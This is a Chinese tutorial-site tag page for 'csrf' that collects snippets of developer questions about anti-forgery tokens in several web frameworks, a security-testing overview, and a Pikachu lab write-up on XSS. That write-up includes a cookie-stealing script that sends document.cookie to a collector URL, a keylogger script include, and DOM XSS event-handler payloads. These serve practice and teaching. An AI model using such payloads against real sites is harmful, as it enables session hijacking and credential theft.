csrf | 易学教程

include antiforgerytoken in ajax post ASP.NET MVC

阅读更多关于 include antiforgerytoken in ajax post ASP.NET MVC

问题 I am having trouble with the AntiForgeryToken with ajax. I'm using ASP.NET MVC 3. I tried the solution in jQuery Ajax calls and the Html.AntiForgeryToken(). Using that solution, the token is now being passed: var data = { ... } // with token, key is '__RequestVerificationToken' $.ajax({ type: "POST", data: data, datatype: "json", traditional: true, contentType: "application/json; charset=utf-8", url: myURL, success: function (response) { ... }, error: function (response) { ... } }); When I

安全测试基础

阅读更多关于安全测试基础

转载网上一篇关于安全测试的文章转载文章标题名为“ 安全测试基础（Ⅰ）安全测试概述 ” 转载地址： https://www.cnblogs.com/rd-ddddd/p/7718206.html#4367070 一般来说，版本功能测试完成，对应的用例也实现了自动化，性能、兼容、稳定性测试也完成了以后，我们就需要考虑到系统的安全问题，特别是涉及到交易、支付、用户账户信息的模块，安全漏洞会带来极高的风险。一．安全测试原则与常见的安全威胁： 1.安全需求： ※认证:对认证的用户的请求返回 ※访问控制：对未认证的用户的权限控制和数据保护 ※完整性：用户必须准确的收到服务器发送的信息 ※机密性：信息必须准确的传递给预期的用户 ※可靠性：失败的频率是多少？网络从失败中恢复需要多长时间？采取什么措施来应对灾难性的失败？（个人理解这个地方应该更偏向于容错容灾测试的范畴） ※不可抵赖：用户应该能证明接收到的数据来自特定的服务器 2.常见的安全测试内容权限控制 SQL注入 URL安全测试 XSS（跨站脚本攻击） CSRF（跨站请求伪造） URL跳转漏洞其他安全方面的考量接下来，我们以一个C#实现的下常见的MVC架构网站为例，来分析具体的各个安全测试角度。二.权限控制权限控制相对来说比较简单，功能测试的过程中也接触过不少，主要就是考虑以下方面： 1.用户权限：我们假设存在两个用户A,B

Trying to use React/Ajax calls with Spring MVC and Thymeleaf

阅读更多关于 Trying to use React/Ajax calls with Spring MVC and Thymeleaf

问题 according to the docs, I should be able to include the CSRF tokens in the header, grab them with jquery, and include them in the headers of my ajax calls. Unfortunately, including <html class='default' xmlns="http://www.w3.org/1999/xhtml" xmlns:th="http://www.thymeleaf.org"> <head> <meta charset='UTF-8'/> <meta http-equiv='X-UA-Compatible' content='IE=Edge,chrome=1' /> <meta name="_csrf" content="${_csrf.token}"/>  <meta name="_csrf_header" content=

Is it necessary to protect JAX-RS requests against CSRF?

阅读更多关于 Is it necessary to protect JAX-RS requests against CSRF?

问题 Is it necessary to protect JAX-RS requests against CSRF? By definition REST is stateless and therefore exists no session id (session cookie), because there is no session at all (see also https://stackoverflow.com/a/15746639/5277820). My Spring Security Java Configuration: @Configuration @EnableWebSecurity public class SecurityConfig { @Configuration @Order(1) public static class JaxRsWebSecurityConfigurationAdapter extends WebSecurityConfigurerAdapter { @Override protected void configure

Multiple Django sites on the same domain - CSRF fails

阅读更多关于 Multiple Django sites on the same domain - CSRF fails

问题 I have two applications running on the same domain on different ports, both using csrf middleware. When I log-in in one of the applications all POST submits from the other fail. I presume because the SESSION_COOKIE_DOMAIN is the same. I tried changing SESSION_COOKIE_NAME , however, the 'csrftoken' cookie is used in the forms POST request on both sites, no matter that there now is a new cookie with the name I specified. When I post information with AJAX and get the csrf token from the cookie

flask-wtforms组件

阅读更多关于 flask-wtforms组件

wtforms 对用户提交的数据进行格式校验，功能与django中的Form雷同功能知识点: 定义类定义字段(label/validate/default/choices...) 钩子函数重写init在init中去数据库中获取数据并赋值 self.hobby.choices = ... 使用类 form = Form(),默认只展示标签. form = Form(data={'name':'xx'}) 显示标签+默认值 (用于编辑) form = Form(formdata=request.form) 用于接收用户提交的数据, if form.validate(): form.data else: form.errors 安装 pip3 install wtforms 用户登录实例 app.py from flask import Flask, render_template, request, redirect from wtforms import Form from wtforms.fields import core from wtforms.fields import html5 from wtforms.fields import simple from wtforms import validators from wtforms import widgets

xss csrf

阅读更多关于 xss csrf

反射形发现有字数限制，先改为99 然后输入提交后就会弹窗查看源码，发现以及写入源码中。反射形（post) 先构造一个网页模拟提交然后构造语句<script>document.location = ' http://127.0.0.1/pikachu/pkxss/xcookie/cookie.php?cookie= ' + document.cookie;</script> 之后就收集到cookies 存储型xss 先改 rk.js 文件，然后将其构造为payload <script src="http://192.168.171.129/pikachu/pkxss/rkeypress/rk.js"></script> 然后再次登录，输入sdafffffff 输入信息后，可以发现信息以及被发送查看后台发现输入被记录。 dom型xss 发现输入变为标签内容，查看源码根据源码输入payload ' onclick=alert("xss")> 关闭herf 并同时设为点击弹窗。 dom型xss-s 查看源码，发现将+替换为空格，所以继续构造payload ‘ onlick=alert("aqh")> 能够正常弹窗 xss之盲打查看发现不会有任何内容回显，猜测在后台记录尝试构造payload 后台查看图像，发现攻击成功。 xss之过滤发现会过滤掉script

How to prevent a cross site request forgery attack using an image URL?

阅读更多关于 How to prevent a cross site request forgery attack using an image URL?

问题 From ha.ckers.org/xss.html: IMG Embedded commands - this works when the webpage where this is injected (like a web-board) is behind password protection and that password protection works with other commands on the same domain. This can be used to delete users, add users (if the user who visits the page is an administrator), send credentials elsewhere, etc.... This is one of the lesser used but more useful XSS vectors: <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables

Play Framework 2.6 CSRF and Session

阅读更多关于 Play Framework 2.6 CSRF and Session

问题 I got strange issue. I'm implementing cart functionality on my website and I use session to store cart positions. I have a POST action to add new position to cart, and I have CSRF filter enabled to secure website. I call it with ajax on a product page, so first call is okay, but second says Unauthorized and in logs there are [CSRF] Check failed because no token found in headers for /cart . But it has. I call it with: $("form").submit(function(e){ e.preventDefault(); $.ajax({ url: '/cart',

Antiforgery token in a distributed SPA application

阅读更多关于 Antiforgery token in a distributed SPA application

问题 I am working on a distributed high availability single-page-application which gets served from a cluster of docker nodes. Occasionally a node will die (for perfectly valid reasons, so that is not the issue). All the clients get then seamlessly rerouted to one of the other nodes. Unfortunately, all of their XSRF tokens are then invalid, as they were stored in memory in the client. The question is, thus, how can we distribute storage of the current XSRF token(s) in a *nix based setup? 回答1: To